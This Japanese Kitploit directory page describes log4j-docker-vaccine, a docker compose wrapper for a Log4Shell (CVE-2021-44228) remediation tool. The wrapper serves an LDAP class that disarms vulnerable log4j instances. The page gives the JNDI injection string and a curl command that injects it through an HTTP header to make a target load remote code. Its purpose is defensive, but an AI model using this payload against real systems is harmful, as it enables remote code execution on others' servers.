Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
log4j-docker-vaccine — docker compose ソリューション - log4j2の脆弱性 CVE-2021-44228 に対するワクチン環境を実行する | Kitploit
ツール/GitHubGitHub/jeffbryner/log4j-docker-vaccine
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubjeffbryner/log4j-docker-vaccine

log4j-docker-vaccine

docker compose ソリューション - log4j2の脆弱性 CVE-2021-44228 に対するワクチン環境を実行する

リポジトリを見る
24年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Log4j Docker Vaccine

Cyberreason が提供する log4j ワクチンをコンテナ化して実行する方法

  • https://github.com/Cybereason/Logout4Shell

実行方法

このリポジトリをクローンします:

root@kitploit:~
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git

containers.env ファイルを編集し、ターゲットがアクセス可能な正確なプライベートIPまたはパブリックIP/DNSを設定します。デフォルトのエントリはおそらく機能しません!

コンテナをビルドして実行します:

root@kitploit:~
docker-compose -f docker-compose.yml -p vaccine up

これで、脆弱な log4j インスタンスを無害化するための Log4jRCE クラスを配信する LDAP サーバーが起動します。

必要に応じて、ngrok を使用してこれをインターネットに公開することもできます。

  • https://dashboard.ngrok.com/get-started/setup
root@kitploit:~
ngrok tcp 1389

悪名高い jndi 入力文字列を使用して、脆弱な log4j インスタンスをこのサーバーに送信できます:

root@kitploit:~
${jndi:ldap://<ngrokurlgoeshere>:1389/a}

テスト

意図的に脆弱なバージョンの log4j がコンテナで利用可能です:

  • https://github.com/christophetd/log4shell-vulnerable-app

手順に従って起動し、テストに使用できます:

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app

そして、以下のコマンドで無害化をトリガーします:

root@kitploit:~
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'
ツールをダウンロード